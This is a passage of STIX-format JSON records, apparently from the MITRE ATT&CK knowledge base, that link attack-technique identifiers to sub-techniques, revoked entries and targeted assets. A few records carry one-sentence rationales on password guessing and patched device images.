"attack-pattern--c675646d-e204-4aa8-978d-e3d6d65885c4", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8787d75b-9c28-437d-b6b5-93d2d7e8462e", "created": "2020-02-11T18:23:26.146Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--eb062747-2193-45de-8fa2-e62549c37ddf", "target_ref": "attack-pattern--54a649ff-439a-41a4-9856-8d144a2551ba", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8851f959-22db-4346-9505-9a3f534fb240", "created": "2022-07-08T12:39:29.781Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-07-08T12:39:29.781Z", "description": "", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--04a5a8ab-3bc8-4c83-95c9-55274a89786d", "target_ref": "attack-pattern--0458aab9-ad42-4eac-9e22-706a95bafee2", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--88aa51c3-b020-4283-b325-798dad4134c4", "created": "2020-01-24T14:18:13.657Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--b53dbcc6-147d-48bb-9df4-bcb8bb808ff6", "target_ref": "attack-pattern--63220765-d418-44de-8fae-694b3912317d", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--88edcf36-a6f2-474f-b9c2-7800b34919a2", "created": "2023-09-28T21:24:07.864Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T21:24:07.864Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--85a45294-08f1-4539-bf00-7da08aa7b0ee", "target_ref": "x-mitre-asset--e2c3336a-dd93-44d6-8246-f93cf132c499", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8933e64e-6a0d-4cd1-8cab-514424f22410", "created": "2020-03-14T18:19:53.327Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--c848fcf7-6b62-4bde-8216-b6c157d48da0", "target_ref": "attack-pattern--b18eae87-b469-4e14-b454-b171b416bc18", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--89423e8b-a8bb-4658-88f7-70cd6912f61f", "created": "2020-01-15T18:00:33.973Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--c0dfe7b0-b873-4618-9ff8-53e31f70907f", "target_ref": "attack-pattern--03259939-0b57-482f-8eb5-87c0e0d54334", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--894458c5-1356-456d-86b3-3a539b5e674c", "created": "2024-05-22T17:07:29.221Z", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-05-22T17:07:29.221Z", "description": "Asset Mapping Rationale: Adversaries may use Patch System Image to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices. Modify System Image may include implanted code to the operating system for network devices to provide access for adversaries using a specific password.", "relationship_type": "targets", "source_ref": "attack-pattern--fa44a152-ac48-441e-a524-dd7b04b8adcd", "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8968bf11-5ba9-4012-a277-4a40ed796fbf", "created": "2020-10-02T16:32:33.229Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--ed730f20-0e44-48b9-85f8-0e2adeb76867", "target_ref": "attack-pattern--937e4772-8441-4e4a-8bf0-8d447d667e23", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--897cfc36-4253-4e1e-8825-726dbe9088a2", "created": "2023-09-28T19:55:02.944Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T19:55:02.944Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--53a26eee-1080-4d17-9762-2027d5a1b805", "target_ref": "x-mitre-asset--986c455b-0f43-42b6-8360-33ac48bd9990", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--899f5d50-95bf-47e6-a95a-cb6e46a4c9bd", "created": "2021-10-15T19:48:30.398Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-05-24T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--8252f135-ed26-4ce1-ae61-f26e94429a19", "target_ref": "attack-pattern--acd0ba37-7ba9-4cc5-ac61-796586cd856d", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--89a3764f-0695-4121-9298-fe25d98dffe1", "created": "2024-02-15T13:45:20.908Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2024-02-15T13:45:20.908Z", "description": "", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--b0e54bf7-835e-4f44-bd8e-62f431b9b76a", "target_ref": "attack-pattern--106c0cf6-bf73-4601-9aa8-0945c2715ec5", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--89d09e89-aded-4194-811b-3da14561e943", "created": "2020-03-19T19:13:51.095Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--74d2a63f-3c7b-4852-92da-02d8fbab16da", "target_ref": "attack-pattern--3d333250-30e4-4a82-9edc-756c68afc529", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8a468c91-7863-4569-8e5f-a71cd565478e", "created": "2020-01-24T15:05:58.613Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--6d4a7fb3-5a24-42be-ae61-6728a2b581f6", "target_ref": "attack-pattern--b6301b64-ef57-4cce-bb0b-77026f14a8db", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8a765743-9caf-4c8a-9c58-6fe2c1993108", "created": "2023-09-29T16:42:43.736Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T16:42:43.736Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--36e9f5bc-ac13-4da4-a2f4-01f4877d9004", "target_ref": "x-mitre-asset--69d1b1ef-e918-4cfd-9a98-29debd04cb32", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8ab253ed-9bf8-4e0d-b367-f9d5349a7cfc", "created": "2020-10-02T15:49:03.913Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--34ab90a3-05f6-4259-8f21-621081fdaba5", "target_ref": "attack-pattern--9d48cab2-7929-4812-ad22-f536665f0109", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8b5b1096-80f7-43dd-a881-af92beac20f9", "created": "2020-06-29T15:36:41.688Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--b5327dd1-6bf9-4785-a199-25bcbd1f4a9d", "target_ref": "attack-pattern--22905430-4901-4c2a-84f6-98243cb173f8", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8b66ef05-63ad-4b12-b6b3-9a44475d781c", "created": "2020-06-16T18:42:20.836Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--0708ae90-d0eb-4938-9a76-d0fc94f6eec1", "target_ref": "attack-pattern--144e007b-e638-431d-a894-45d90c54ab90", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8b86fa49-6d13-42b4-bd48-814abfd6793f", "created": "2020-06-24T12:42:35.464Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--6b57dc31-b814-4a03-8706-28bc20d739c4", "target_ref": "attack-pattern--a10641f4-87b4-45a3-a906-92a149cb2c27", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8bb658a4-47b3-4181-9503-b3b77132bcbe", "created": "2024-05-22T17:21:43.024Z", "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-05-28T02:51:06.422Z", "description": "Asset Mapping Rationale: Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Typically, management services over commonly used ports are used when guessing passwords.", "relationship_type": "targets", "source_ref": "attack-pattern--09c4c11e-4fa1-4f8c-8dad-3cf8e69ad119", "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8bcaac7c-46c8-459a-a55c-b1e218c62cfc", "created": "2020-01-24T15:15:44.235Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--d376668f-b208-42de-b1f5-fdfe0ad4b753", "target_ref": "attack-pattern--9c45eaa3-8604-4780-8988-b5074dbb9ecd", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8bcc4b82-d25f-49ce-a4f2-967994ae21de", "created": "2020-02-18T18:34:49.737Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--b7dc639b-24cd-482d-a7f1-8897eda21023", "target_ref": "attack-pattern--dcaa092b-7de9-4a21-977f-7fcb77e89c48", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8be10d07-69bd-47ae-9dea-5918d1005699", "created": "2020-01-14T17:23:05.953Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--52f3d5a6-8a0f-4f82-977e-750abf90d0b0", "target_ref": "attack-pattern--0042a9f5-f053-4769-b3ef-9ad018dfa298", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8bfeed6a-a0c6-4f11-81b2-f32225c85ac4", "created": "2023-10-02T20:21:16.665Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-10-02T20:21:16.665Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c9a8d958-fcdb-40d2-af4c-461c8031651a", "target_ref": "x-mitre-asset--2b676abd-8263-49ea-81a4-78a7e1f776fe", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8c9aa081-0e56-4f57-a54e-6decf6aab819", "created": "2021-11-19T14:13:11.473Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-05-24T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--ffe59ad3-ad9b-4b9f-b74f-5beb3c309dc1", "target_ref": "attack-pattern--22905430-4901-4c2a-84f6-98243cb173f8", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8ccd5f5c-420a-413b-81ef-5e40f401be95", "created": "2023-09-28T20:31:46.082Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T20:31:46.082Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--cd2c76a4-5e23-4ca5-9c40-d5e0604f7101", "target_ref": "x-mitre-asset--75f810ad-b678-4c57-b93b-fdc79bba0c04", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8ccf5cfb-df98-44e0-afb7-6e2d6c699944", "created": "2020-02-12T18:57:58.597Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--4579d9c9-d5b9-45e0-9848-0104637b579f", "target_ref": "attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8d2c3989-1b2f-4620-9315-3ef02c781679", "created": "2020-11-23T15:35:53.894Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--d336b553-5da9-46ca-98a8-0b23f49fb447", "target_ref": "attack-pattern--3fc9b85a-2862-4363-a64d-d692e3ffbee0", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8d403e65-4c96-424e-9bb9-3a2eb6d66af5", "created": "2020-03-10T18:26:56.478Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--810aa4ad-61c9-49cb-993f-daa06199421d", "target_ref": "attack-pattern--d157f9d2-d09a-4efa-bb2a-64963f94e253", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8d5a5b8c-48a3-4d1c-bb39-89fd4a03bd15", "created": "2020-01-24T13:40:47.476Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--98034fef-d9fb-4667-8dc4-2eab6231724c", "target_ref": "attack-pattern--b6301b64-ef57-4cce-bb0b-77026f14a8db", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8d5b2fe4-24c5-4a07-a1b0-8d1bac21af69", "created": "2020-01-31T18:59:59.399Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--a127c32c-cbb0-4f9d-be07-881a792408ec", "target_ref": "attack-pattern--840a987a-99bd-4a80-a5c9-0cb2baa6cade", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8d7957af-a314-4e12-bde6-6148e234ff58", "created": "2020-02-11T19:09:48.749Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--0dbf5f1b-a560-4d51-ac1b-d70caab3e1f0", "target_ref": "attack-pattern--650c784b-7504-4df7-ab2c-4ea882384d1e", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8d7e2aa5-129a-4060-88ae-9fc066af13c7", "created": "2023-09-28T21:25:20.417Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T21:25:20.417Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ba203963-3182-41ac-af14-7e7ebc83cd61", "target_ref": "x-mitre-asset--e2c3336a-dd93-44d6-8246-f93cf132c499", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8dda1296-0835-4748-92a3-24b34eb8a084", "created": "2021-08-04T20:54:03.286Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--11f29a39-0942-4d62-92b6-fe236cf3066e", "target_ref": "attack-pattern--42e8de7b-37b2-4258-905a-6897815e58e0", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8df70aec-5237-4534-9439-e701dfca5cce", "created": "2022-07-08T12:46:15.543Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-07-08T12:46:15.543Z", "description": "", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--df1bc34d-1634-4c93-b89e-8120994fce77", "target_ref": "attack-pattern--7e3beebd-8bfe-4e7b-a892-e44ab06a75f9", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8dfa86a7-1b39-4457-bd41-c1ff62685711", "created": "2020-01-24T18:50:29.218Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--6e6845c2-347a-4a6f-a2d1-b74a18ebd352", "target_ref": "attack-pattern--f0589bc3-a6ae-425a-a3d5-5659bfee07f4", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8e1cab5a-7a82-4116-8727-d77200f52419", "created": "2020-01-24T14:14:05.642Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--01df3350-ce05-4bdf-bdf8-0a919a66d4a8", "target_ref": "attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8ed7e323-578c-4a62-bf32-0bf2fefa872b", "created": "2023-09-29T17:05:44.653Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T17:05:44.653Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--32632a95-6856-47b9-9ab7-fea5cd7dce00", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8f3ea79e-b4dc-4bc6-8f82-28f68113d0fe", "created": "2024-05-21T16:32:23.972Z", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-05-21T16:32:23.972Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--20fb2507-d71c-455d-9b6d-6104461cf26b", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8f5086fd-1cae-4f43-8a23-e47ace0620db", "created": "2020-03-10T18:34:39.967Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--f44731de-ea9f-406d-9b83-30ecbb9b4392", "target_ref": 